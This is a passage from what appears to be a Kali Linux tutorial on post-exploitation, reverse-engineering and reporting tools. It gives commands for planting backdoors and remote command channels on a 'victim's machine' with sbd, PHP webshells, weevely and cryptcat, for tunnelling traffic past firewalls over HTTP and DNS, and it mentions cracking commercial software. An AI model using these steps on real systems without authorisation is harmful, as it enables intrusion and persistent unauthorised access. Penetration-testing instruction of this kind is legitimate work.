If you type “ls” it will list all the powersploit tools that you can download and install in the victim’s machine after you have gained access. Most of them are name self-explained according to their names.

Powersploit

An easy way to download this tool on the victim’s machine is to create a web server, which powersploit tools allow to create easily using the following command −

python -m SimpleHTTPServer 
Download Tool

After this, if you type: http://<Kali machine ip_address>:8000/ following is the result.

Directory Listimg

Sbd

sbd is a tool similar to Netcat. It is portable and can be used in Linux and Microsoft machines. sbd features AES-CBC-128 + HMAC-SHA1 encryption> Basically, it helps to connect to a victim’s machine any time on a specific port and send commands remotely.

To open it, go to the terminal and type “sbd -l -p port” for the server to accept connections.

Connection Accept

In this case, let us put port 44 where the server will listen.

Case Port

On the victim’s site, type “sbd IPofserver port”. A connection will be established where we can send the remote commands.

In this case, it is “localhost” since we have performed the test on the same machine.

Ipofserver

Finally, on the server you will see that a connection has occurred as shown in the following screenshot.

Server Connection

Webshells

Webshells can be used to maintain access or to hack a website. But most of them are detected by antiviruses. The C99 php shell is very well known among the antivirus. Any common antivirus will easily detect it as a malware.

Generally, their main function is to send system command via web interfaces.

To open it, and type “cd /usr/share/webshells/” in the terminal.

Webshell

As you see, they are divided in classes according to the programing language : asp , aspx, cfm, jsp, perl,php

If you enter in the PHP folder, you can see all the webshells for php webpages.

Folder

To upload the shell to a web server, for example “simple-backdoor.php” open the webpage and URL of the web shell.

At the end, write the cmd command. You will have all the info shown as in the following screenshot.

Write Command

Weevely

Weevely is a PHP web shell that simulate telnet-like connection. It is a tool for web application post exploitation, and can be used as a stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.

To open it, go to the terminal and type “weevely” where you can see its usage.

Weevely

To generate the shell, type “weevely generate password pathoffile”. As seen in the following screenshot, it is generated on the “Desktop” folder and the file is to upload in a webserver to gain access.

Generate Shell

After uploading the web shell as shown in the following screenshot, we can connect with cmd to the server using the command “weevely URL password” where you can see that a session has started.

Uploading File

http-tunnel

http-tunnel creates a bidirectional virtual data stream tunneled in HTTP requests. The requests can be sent via a HTTP proxy if so desired. This can be useful for users behind restrictive firewalls. If WWW access is allowed through a HTTP proxy, it’s possible to use http-tunnel and telnet or PPP to connect to a computer outside the firewall.

First, we should create a tunnel server with the following command −

httptunnel_server –h 

Then, on the client site type “httptunnel_client –h” and both will start to accept connections.

dns2tcp

This is again a tunneling tool that helps to pass the TCP traffic through DNS Traffic, which means UDP 53 port.

To start it, type “dns2tcpd”. The usage is explained when you will open the script.

DNSTcp

On the server site, enter this command to configure the file.

#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0 
port = 53 user=nobody 
chroot = /root/dns2tcp 
pid_file = /var/run/dns2tcp.pid 
domain = your domain key = secretkey 
resources = ssh:127.0.0.1:22 
END 
#dns2tcpd -f .dns2tcpdrc

On Client site, enter this command.

# cat >>.dns2tcprc 
<<END domain = your domain 
resource = ssh 
local_port = 7891 
key = secretkey 
END
# dns2tcpc -f .dns2tcprc 
# ssh root@localhost -p 7891 -D 7076 

Tunneling will start with this command.

cryptcat

It is another tool like Netcat which allows to make TCP and UDP connection with a victim’s machine in an encrypted way.

To start a server to listen for a connection, type the following command −

cryptcat –l –p port –n 
cryptcat

Where,

  • -l stands for listening to a connection
  • -p stands for port number parameter
  • -n stands for not doing the name resolution

On client site, the connection command is “cryptcat IPofServer PortofServer”

Port of Server

In this chapter, we will learn about the reverse engineering tools of Kali Linux.

OllyDbg

OllyDbg is a 32-bit assembler level analyzing debugger for Microsoft Windows applications. Emphasis on binary code analysis makes it particularly useful in cases where the source is unavailable. Generally, it is used to crack the commercial softwares.

To open it, go to Applications → Reverse Engineering → ollydbg

OllyDbg

To load a EXE file, go the “Opening folder” in yellow color, which is shown in a red square in the above screenshot.

After loading, you will have the following view where you can change the binaries.

Binaries

dex2jar

This is an application that helps convert APK file (android) to JAR file in order to view the source code. To use it, open the terminal and write ”d2j-dex2jar –d /file location”.

In this case, the file is “classes.dex” on the desktop.

Classes

The following line shows that a JAR file has been created.

Jar File
Created File

jd-gui

JD-GUI is a standalone graphical utility that displays Java source codes of “.class” files. You can browse the reconstructed source code. In this case, we can reconstruct the file that we extracted from the dex2jar tool.

To launch it, open the terminal and write “jd-gui” and the following view will open.

To import the file, click the open folder Open Folder icon on the left upper corner and then import the file.

Jd Gui

apktool

Apktool is one of the best tools to reverse the whole android application. It can decode resources to nearly an original form and rebuild them after making modifications.

To open it, go to the terminal and write “ apktool”.

To decompile a apk file, write “apktool d apk file”.

Apktool

Decompilation will start as shown in the following screenshot.

Decompilation

In this chapter, we will learn about some reporting tools in Kali Linux.

Dradis

In all this work that we have performed, it is important to share the results that was produced, to track our work, etc. For this purpose, Kali has a reporting tool called dradis which is a web service.

Step 1 − To start Dradis, type “service dradis start”.

Dradis

Step 2 − To open, go to Applications → Reporting Tools → dradis.

Reporting

The web URL will open. Anybody in LAN can open it in the following URL https://IP of kali machine:3004

Log in with the username and password that was used for the first time.

LAN Open

Step 3 − After logging in, you can import files from NMAP, NESSUS, NEXPOSE. To do so, go to “Import from file” → click “new importer(with real-time feedback)”.

Import Real Time

Step 4 − Select the file type that you want to upload. In this case, it is “Nessus scan” → click “Browse”.

Upload Manager

If you go to the home page now, on the left panel you will see that the imported scans have are in a folder with their host and port details.

Port Details

Metagoofil

Metagoofil performs a search in Google to identify and download the documents to the local disk and then extracts the metadata. It extracts metadata of public documents belonging to a specific company, individual, object, etc.

To open it, go to: “usr/share/metagoofil/”.

Metagoofil

To start searching, type the following command −

python metagoofil.py 

You can use the following parameters with this command −

  • –d (domain name)
  • –t (filetype to download dox,pdf,etc)
  • –l (limit the results 10, 100 )
  • –n (limit files to download)
  • –o ( location to save the files)
  • –f (output file)

The following example shows only the domain name is hidden.

Hidden Domain Name

TOP 35 Linux Basic Commands Every User Should Know..

Translate »